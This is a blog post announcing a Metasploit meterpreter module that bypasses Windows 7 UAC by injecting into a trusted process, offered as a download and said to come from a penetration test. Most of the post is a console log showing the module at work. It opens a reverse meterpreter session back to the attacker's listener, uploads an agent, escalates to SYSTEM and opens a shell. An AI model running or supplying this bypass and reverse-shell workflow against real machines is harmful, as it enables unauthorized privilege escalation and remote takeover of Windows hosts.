Happy New Year everyone! Here is a nice new addition to bypass UAC through meterpreter. It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson (http://www.pretentiousname.com/misc/win7_uac_whitelist2.html) on bypassing Windows UAC. This method takes advantage of process injection that has a trusted Windows Publisher Certificate (example explorer.exe which runs at medium integrity). This is fully functioning on both x86/64 bit platforms. Source code is in the zip along with the meterpreter plugin. You can download it here. [fusion_builder_container hundred_percent="yes" overflow="visible"][fusion_builder_row][fusion_builder_column type="1_1" background_position="left top" background_color="" border_size="" border_color="" border_style="solid" spacing="yes" background_image="" background_repeat="no-repeat" padding="" margin_top="0px" margin_bottom="0px" class="" id="" animation_type="" animation_speed="0.3" animation_direction="left" hide_on_mobile="no" center_content="no" min_height="none"][*] Sending stage (749056 bytes) to 172.16.32.130 [*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1544) at Fri Dec 31 20:43:24 -0500 2010 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. meterpreter > run bypassuac [*] Creating a reverse meterpreter stager: LHOST=172.16.32.128 LPORT=4546 [*] Running payload handler [*] Uploading Windows UACBypass to victim machine. [*] Bypassing UAC Restrictions on the system.... [*] Meterpreter stager executable 73802 bytes long [*] Uploaded the agent to the filesystem.... [*] Executing the agent with endpoint 172.16.32.128:4546 with UACBypass in effect... meterpreter > [*] Meterpreter session 2 opened (172.16.32.128:4546 -> 172.16.32.130:1547) at Fri Dec 31 20:43:40 -0500 2010 meterpreter > Background session 1? [y/N] msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getsystem ...got system (via technique 1). meterpreter > shell Process 416 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:Windowssystem32>whoami whoami nt authoritysystem C:Windowssystem32>[/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]